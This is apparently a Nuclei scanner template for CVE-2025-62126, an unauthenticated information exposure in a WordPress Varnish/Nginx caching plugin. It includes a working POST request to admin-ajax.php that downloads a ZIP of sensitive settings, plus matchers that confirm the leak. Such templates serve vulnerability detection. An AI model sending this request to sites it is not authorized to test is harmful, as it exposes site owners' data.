id: CVE-2025-62126 info: name: WordPress Varnish/Nginx Proxy Caching <= 1.8.3 - Information Exposure author: pussycat0x severity: medium description: | Razvan Stanga Varnish/Nginx Proxy Caching <= 1.8.3 contains an insertion of sensitive information into sent data vulnerability caused by improper handling of embedded sensitive data, letting attackers retrieve sensitive information, exploit requires crafted requests. remediation: | Update to the latest version beyond 1.8.3. impact: | Attackers can retrieve embedded sensitive information, potentially leading to data leakage. reference: - https://github.com/razvanstanga/varnish-caching-wordpress-plugin/pull/15 - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/vcaching/varnishnginx-proxy-caching-183-unauthenticated-information-exposure - https://nvd.nist.gov/vuln/detail/CVE-2025-62126 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2025-62126 epss-score: 0.0087 epss-percentile: 0.7551 cwe-id: CWE-200 metadata: verified: true max-request: 1 vendor: razvanstanga product: varnish-caching-wordpress-plugin framework: wordpress tags: cve,cve2025,wordpress,wp,wp-plugin,vcaching,exposure http: - raw: - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded action=varnish_caching_download&option_page=varnish_caching_download&varnish_caching_varnish_version=4 matchers-condition: and matchers: - type: binary part: body binary: - "504b0304" - type: word part: content_type words: - "application/zip" - "application/octet-stream" condition: or - type: status status: - 200 extractors: - type: regex name: filename part: header group: 1 regex: - 'filename="?([^";\r\n]+)' # digest: 4a0a00473045022100d221375b2a1e8233347d0bedb52f72d80ccd9fc0c8eb0ae292493ca9cd16d086022019f98501da5714c46b5dc8c85fb4fc569f95babd46e15c106c551d61f9c62236:922c64590222798bb761d5b6d8e72950